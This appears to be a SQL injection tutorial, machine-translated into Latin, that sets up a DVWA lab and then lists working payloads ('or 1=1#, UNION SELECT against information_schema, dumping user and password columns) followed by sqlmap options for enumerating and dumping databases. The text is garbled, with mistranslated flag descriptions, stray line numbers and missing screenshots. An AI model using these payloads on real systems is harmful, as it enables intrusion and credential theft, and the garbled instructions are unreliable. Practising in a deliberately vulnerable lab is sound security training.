Technology sharing

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

1. Securitatis penetratio

1,1 Classification

• web database securitatem
• Interretialem applicationem server securitatis (facilis fasciculi vulnerability, fasciculi vulnerability fasciculi inclusio)
• Web client securitatem (XSS cross-site impetum)

2. sql iniectio

2.1 Introductio ad sql iniectio

• SQL iniectio summarum index securitatis proventus
• Impetum SQL iniectio est quod initus parametri non eliquantur et tunc directe in constitutionem SQL scinduntur pro analysi.
• SQL iniectio est impetus technicae artis quae SQL codicem addit ad parametros inputandas et eam ministranti ad parsing et supplicium transmittit.

2.2 SQL principium iniectio

• Submittit ingenia inimicus in pagina malitiosis
• Servo parametros summittos non eliquare nec eliquare insufficiens est.
• Impugnatores splicing SQL dicta ad obtinendum sensitiva notitia ex datorum

2.3 Pericula sql iniectio

• Database Leak
• User data esset contra legem empti et venditi
• Composuisse telam applicationem securitatis

2.4 SQL iniectio exsecutionis methodi

• Manual
  • Invenies: iniectio punctum
  • Input: SQL syntaxis communis iniectio coniunctio pro iniectio
• automatic (instrumentum)
  • Instrumentum: Scan ad iniectio punctorum
  • Input: Automatarie temptare varias compositiones syntaxis

3.Environment setup

3.1 vmware virtualis apparatus

3.1.1 Function

• Software apparatus virtualis, programmate utere potes ut multiplices systemata virtuali operativa (Linux, fenestras) in machinis physicis instituere possis
• Scopum fuci ac penetrantes currunt cum VMware software
  VMware download consequat

3.2 Target fucum (disciplina ut project environment)

effectus

• A Linux systematis apparatus virtualis.
• OWASP scopum fucum institutionem consequat

3.3 Penetratio machinae (sql iniectio ambitu cognita oppugnare)

effectus;

• Kali centum instrumenta continet, quae variis informationibus munia securitatis adhiberi possunt, ut acumen probationis, investigationis securitatis

4. Manuale iniectio

4.1 Praeparatio Opera

Description: Practice manuale iniectio per applicationem telam fuci
gradum;

• Satus scopum fucum OWASP
  

• Obvius fucus per pasco

• Visita OWASP-dvwa project
  

• Login
  

• Lego sql iniectio applicationis
  

4.2 Reperio iniectio punctum

Nota: Maxime utitur uno quotes et effugium ingenia, maxime unum quotes
principium;

#后台程序sql语句
select first_name,last_name from users where user_id = '$id';
#输入单引号('),相当于将sql语句闭合，后面就可以使用附加其他逻辑条件了
select first_name,last_name fro users where user_id = ''';
1
2
3
4

4.3 Logical OR

4.4 Coniecto numero columnarum

1. per unionem

' union select 1,2 #
1

2. per logicam OR*

'or 1=1#
1

4.5 Da databases, tabulas et columnas

Ut nomen database

' union select 1,database()#
1

Accipere mensam

' union select table_name,1 from information_schema.tables where table_schema='dvwa' #
1

Accipere columna

' union select column_name,1 from information_schema.columns where table_name='users' #
1

4.6 Get data

//1. 获取单个字段数据
' union select user,1 from users#

//2. 获取两个字段
' union select user,password from users#
1
2
3
4
5

4.7 munus concat

Munus: Splice chordae plures in una chorda
Syntax: concat(str1, str2,…)
Exemplum:

• Adepto user_id, usor, tesseram ab utentibus mensam et eas in duabus columnis ostende

select user_id,concat (user,password) from dvwa,users;
1

• Solve problema splicing user et password simul

select user_id,concat('user:',user,' password:',password) from dvwa.users;
1

• Ut multa agri

' union select user,concat(first_name,' ',last_name,' ',password) from users#
1

5. Lorem iniectio

5.1 Introductio ad iniectio latae sententiae

Nota: Automatic iniectio ad instrumenta pro opere manuali adhibita pertinet ad operationes iniectiones perficiendas sql.
Instrumentum: sqlmap

5,2 Automatarie injicere elit

• Satus fucum
• Satus penetratio machina

5.3 sqlmap

Instrumentum: sqlmap

• Apertus fons penetrare instrumentum probationis
• Automatarie vulnerabilities iniectio deprehendere et facinus SQL accipere et accipere servientes database
  

5.3.1 Basic usus sqlmap

modulus

• -u: Scan scopum URL
• -batch: Automatarie promptum aliquid notitia
• -Cookie, additional crustulum parametri

step

• Scan punctum iniectio
• Ut nomen database
• Accipere mensam nomine
• Nomen accipere agri
• recuperare notitia

Cum opus est ut aperias, primum crustulum initium paginae obtinemus

Tunc incipit intuens iniectio punctus

felix iniectio

5.3.2 sqlmap accipit nomen bibliothecae

- current-db: Query nomen database in usu hodierno telae
-D: Applicare ad certum database

operatio effectus;

5.3.3 sqlmap accipit mensam

- current-db: Query omnia nomina mensae sub certo bibliothecae (ut opus est uti -D nomen bibliothecae primum denotare)
-T: Specificare mensam

operatio effectus;

5.3.4 sqlmap columnas accipit

- columnas: Query omnes agros sub certa mensa (ut opus est uti -T ad designandum nomen tabulae primae)
-C: speciem agri nomen tuum

operatio effectus;

5.3.5 sqlmap notitia obtinet

-dump: Download notitia

operatio effectus;